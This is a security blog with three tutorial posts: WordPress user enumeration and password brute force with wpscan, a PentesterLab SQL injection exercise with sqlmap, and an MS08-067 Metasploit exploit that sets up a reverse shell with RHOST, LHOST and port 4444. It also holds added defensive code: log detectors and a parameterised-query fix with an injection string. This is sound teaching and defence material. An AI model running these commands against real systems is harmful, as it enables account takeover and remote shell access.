Sunday, 19 June 2016

WPSCAN - A WordPress Scanner



WordPress is one of the most popular CMSs in the world. Popularity does not mean it has the best security; in fact, like other popular services (Facebook, Instagram), WordPress has become one of the main targets for many attackers. One of the tools in Kali for testing WordPress is wpscan. With wpscan we can enumerate the usernames of a WordPress site. Once a username is known, we can run a password dictionary (brute-force) attack, also using wpscan. A weak password is prone to this kind of attack, and in the end you may find that your account has been taken over by someone else.

To test for user enumeration here is the command:

wpscan --url url_of_target --enumerate u


Wait a moment until the table of user logins appears:




Once the login name is known, the next thing we want is the password. wpscan has a built-in password brute-force tool. Remember, though, that a brute-force attack depends on the wordlist you use. If the user has a strong, uncommon password it will be hard to find, but people are often not aware that the password they use is a common one. So a brute-force attack is worth trying.




That command runs the brute-force attack: --wordlist is followed by the wordlist file you want to use. The brute force starts as soon as you enter the command.




After the brute force ends, it shows you a table with the username and the password found. This time I stop here, because it can take a long time. There are many password crackers and brute-force tools with better speed or methods, but wpscan is an easy way to test this.

Now you may wonder: if wpscan exists, how can our WordPress accounts be protected from this kind of attack? There are several methods to prevent user enumeration. One simple method is to use the Stop User Enumeration plugin. The plugin can be found here. When I tried wpscan against a WordPress website that had been security-tested, here is the result I got.
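Blocking enumeration is one side; noticing it is the other. The script below is an added example (not part of the original post and not wpscan's code) that scans constructed Apache combined-format access log lines for the two request patterns this post relies on: a client walking author IDs through `/?author=N` (WordPress answers with a redirect that reveals the login name) or asking the REST users listing at `/wp-json/wp/v2/users`, followed by a burst of POSTs to `wp-login.php` answered with HTTP 200, which is how WordPress re-renders the form after a failed login. The log lines, IP addresses and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" log lines for this example (not from any real site).
# 203.0.113.7 walks author IDs, hits the REST users endpoint, then hammers wp-login.php;
# 198.51.100.4 is an ordinary author who logs in once (302 on success).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Jun/2016:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:01 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Jun/2016:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Jun/2016:10:01:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Jun/2016:10:01:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Jun/2016:10:01:31 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "METHOD path proto" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')


def analyze(log_text, author_threshold=3, login_threshold=5):
    """Return {ip: [reasons]} for clients whose requests look like enumeration or brute force."""
    author_ids = defaultdict(set)     # ip -> distinct ?author= values requested
    rest_users = defaultdict(int)     # ip -> requests to the REST users listing
    failed_logins = defaultdict(int)  # ip -> POSTs to wp-login.php answered with 200
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, path, status = m["ip"], m["method"], m["path"], m["status"]
        a = AUTHOR_RE.search(path)
        if a:
            author_ids[ip].add(int(a.group(1)))
        if path.startswith("/wp-json/wp/v2/users"):
            rest_users[ip] += 1
        # WordPress re-renders the login form with HTTP 200 on a failed login and
        # redirects (302) on success, so a 200 to a POST approximates a failure.
        if method == "POST" and path.startswith("/wp-login.php") and status == "200":
            failed_logins[ip] += 1

    findings = {}
    for ip in set(author_ids) | set(rest_users) | set(failed_logins):
        reasons = []
        if len(author_ids[ip]) >= author_threshold:
            reasons.append("author-id enumeration (%d ids)" % len(author_ids[ip]))
        if rest_users[ip]:
            reasons.append("REST users listing requested")
        if failed_logins[ip] >= login_threshold:
            reasons.append("login brute force (%d failed POSTs)" % failed_logins[ip])
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The thresholds are deliberately low so the sample trips them; on a real site they should be tuned against normal traffic, and a single legitimate author (198.51.100.4 above) requesting one author page and logging in once does not get flagged.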



In conclusion, nothing on the internet is completely safe. WordPress is a high-priority target because many sites are built with it and many of their users know little about security measures.

Notes:
The yellow blocks in the images hide website details, since the target is a live website.

Thursday, 26 May 2016

Pentester Lab SQL Injection Exercise



Pentesterlab.com is one of the online course providers for penetration testing. One of its exercises asks you to test for SQL injection in a vulnerable application. Before you start, you need the ISO file of the vulnerable application. You can download the ISO image here.

Now let's try the exercise.

Notes:

  • Attacker IP: 192.168.0.103

  • Target IP: 192.168.0.102, changed midway to 192.168.0.105

First run sqlmap on Kali with the banner option. The banner tells you the version of MySQL running behind the target application. Use the command shown in the following image.



sqlmap will run the operations needed to detect the version.



Next, the version of MySQL is revealed along with the version of the web server. The MySQL version turned out to be 5.1.63, which is still vulnerable to SQL injection. Once we know that it is still vulnerable, I tried to get more information about the database.



The following command is used to list the databases available on the target.



The available databases are retrieved. Now we know that there are two databases, information_schema and photoblog. Since the name of the web application is photoblog, I'm pretty sure that the database holding the web application's data is the photoblog db. The next step is to get the tables inside the photoblog database.



The following command is used to get the tables of the photoblog database: --tables lists the tables. Note that the target IP changed at this point, but that does not affect the result of the command.



The available tables are shown once the command finishes. Now we see that there are three tables in the photoblog database: categories, pictures, and users. From their names, categories will hold the photo categories, pictures will be the list of photos/images on the photoblog site, and the last table, users, must contain the registered users along with the admin. The next step is to look at the columns of the users table.



Use the following command to get the columns of the users table.



This gives the columns id, login, and password. The next step is to dump the contents of the users table.



The --dump option prints the rows of the users table.



This is the users table along with its contents. Now we know that the login username is admin and the password is P4ssw0rd. The next step is to test the login using admin as the username and P4ssw0rd as the password.



Now go to the login screen of the web application.



There you go. Now you have access as the admin, who can upload images.



Now you know how dangerous it is to expose a parameter in the URL without protecting it. So when designing a web application, carefully consider what the user needs to see. Moreover, avoid building SQL queries out of user input. Using a framework when creating a PHP-based web application is also important, since frameworks usually provide a way to query the database that is free from SQL injection. CodeIgniter, for example, uses Active Record for building queries.
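To make the last paragraph concrete, here is an added example (not part of the PentesterLab exercise or the original post) that rebuilds a small stand-in for the photoblog schema in an in-memory SQLite database and puts the query pattern the post warns against next to its hardened form. The table names come from the post; the rows, titles and the placeholder password hash are constructed. The point is that once the URL parameter is pasted into the SQL text, the client controls the WHERE clause, whereas a bound parameter behind an allow-list check never becomes SQL at all.

```python
import sqlite3

# Constructed stand-in for the exercise's photoblog schema (table names from the post:
# categories, pictures, users); the rows and titles are made up for this example.
SCHEMA = """
CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE pictures (id INTEGER PRIMARY KEY, title TEXT, cat_id INTEGER);
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO categories VALUES (?, ?)", [(1, "Nature"), (2, "Travel")])
    conn.executemany("INSERT INTO pictures VALUES (?, ?, ?)",
                     [(1, "Sunset", 1), (2, "Forest", 1), (3, "Harbour", 2)])
    # Constructed placeholder: a real application stores a password hash, never clear text.
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "admin", "<password-hash-placeholder>"))
    conn.commit()
    return conn


def pictures_in_category_vulnerable(conn, cat):
    # The pattern the post warns against: the URL parameter is concatenated into the
    # SQL text, so whatever the client sends becomes part of the query.
    sql = "SELECT title FROM pictures WHERE cat_id = " + cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def pictures_in_category_safe(conn, cat):
    # Layer 1: allow-list validation; a category id can only consist of decimal digits.
    if not cat.isdigit():
        return []
    # Layer 2: the value travels as a bound parameter, never as SQL text.
    sql = "SELECT title FROM pictures WHERE cat_id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(cat),))]


if __name__ == "__main__":
    db = make_db()
    normal, tampered = "1", "1 OR 1=1"   # the second is what a tampered URL parameter looks like
    print("vulnerable:", pictures_in_category_vulnerable(db, normal),
          pictures_in_category_vulnerable(db, tampered))
    print("safe:      ", pictures_in_category_safe(db, normal),
          pictures_in_category_safe(db, tampered))
```

With the tampered value the vulnerable function returns every picture regardless of category, which is the symptom sqlmap looks for before it goes on to enumerate the schema; the safe function returns nothing because the value never reaches the parser as SQL. The same two layers apply to PHP with PDO or mysqli prepared statements, which is what CodeIgniter's query builder does for you.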

References:





Thursday, 19 May 2016

MS08_067 Vulnerability Demo with Metasploit



A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine has a listener port on which it receives the connection, and through that connection code or command execution is achieved. For this example, I will set up a reverse shell connection. The schema is represented by the image below:



To build this schema, I will use the ms08_067_netapi vulnerability. MS08 stands for Microsoft 2008, the year of the security bulletin that patched this vulnerability, and 067 is the bulletin number within that year (the 67th). The vulnerability is explained here.

First, I select the exploit with the command use windows/smb/ms08_067_netapi. Next I have to set the target host in RHOST. Just type set RHOST 131.107.1.222 to set the target IP address.



Next, run show options to see what has been set up. RHOST now points to 131.107.1.222 and RPORT points to an open port on the target.

The next step is to set the payload. The payload is the code that runs on the target once the exploit succeeds. To get a reverse shell, the payload to set is windows/shell/reverse_tcp. For a reverse shell we need to set the listening host (LHOST), because the target connects back to this host. Set it with set LHOST 131.107.1.101. To check the LHOST again, run show options.



This time, show options also shows the LHOST. The handler will listen on LHOST port 4444. The last command runs the exploit: just type exploit.




There you go: I now have access to a shell on the target.
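From the defender's side, the schema above has a recognisable shape on the network: a host receives a connection on its SMB service port (445) and, moments later, opens a brand-new connection back to that same peer on an unrelated port (4444 in this post). The script below is an added example, not part of the original post or of Metasploit, that looks for exactly that correlation in a constructed CSV connection log. The addresses 131.107.1.222 (target) and 131.107.1.101 (attacking host) are the ones used in the post; the third host, the timestamps and the log format are constructed for the example.

```python
import csv
import io
from datetime import datetime

# Constructed connection log (CSV) for this example. 131.107.1.222 is the target and
# 131.107.1.101 the attacking host from the post; 131.107.1.50 is a benign file-share client.
SAMPLE_CONN_LOG = """\
ts,src,sport,dst,dport,proto
2016-05-19T10:00:00,131.107.1.50,51000,131.107.1.222,445,tcp
2016-05-19T10:02:00,131.107.1.101,49152,131.107.1.222,445,tcp
2016-05-19T10:02:03,131.107.1.222,1045,131.107.1.101,4444,tcp
2016-05-19T10:05:00,131.107.1.222,1046,131.107.1.10,53,udp
"""


def parse_conn_log(text):
    """Parse the CSV into dicts with typed fields, sorted by timestamp."""
    rows = []
    for rec in csv.DictReader(io.StringIO(text)):
        rows.append({
            "ts": datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%S"),
            "src": rec["src"], "sport": int(rec["sport"]),
            "dst": rec["dst"], "dport": int(rec["dport"]),
            "proto": rec["proto"],
        })
    rows.sort(key=lambda r: r["ts"])
    return rows


def find_callbacks(rows, service_port=445, window_seconds=60):
    """Flag a host that accepts a connection on service_port and, within the window,
    opens a new connection back to the same peer: the reverse-shell shape."""
    alerts = []
    for i, inbound in enumerate(rows):
        if inbound["dport"] != service_port:
            continue
        server, client, t0 = inbound["dst"], inbound["src"], inbound["ts"]
        for later in rows[i + 1:]:
            delta = (later["ts"] - t0).total_seconds()
            if delta > window_seconds:
                break  # rows are sorted, nothing later can be inside the window
            if later["src"] == server and later["dst"] == client:
                alerts.append({
                    "server": server,
                    "client": client,
                    "callback_port": later["dport"],
                    "seconds_after": delta,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(parse_conn_log(SAMPLE_CONN_LOG)):
        print("%(server)s called back to %(client)s on port %(callback_port)d "
              "%(seconds_after).0fs after an inbound SMB connection" % alert)
```

The benign client at 131.107.1.50 uses the share and never receives a connection back, so it is not reported; only the server-initiated connection to 131.107.1.101 on port 4444 is. Matching on the callback pattern rather than on port 4444 alone matters because the listener port is a Metasploit option that can be set to anything, whereas a server spontaneously dialling out to a host that just connected to it is unusual regardless of port.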

Reference:

  • https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
  • http://resources.infosecinstitute.com/icmp-reverse-shell/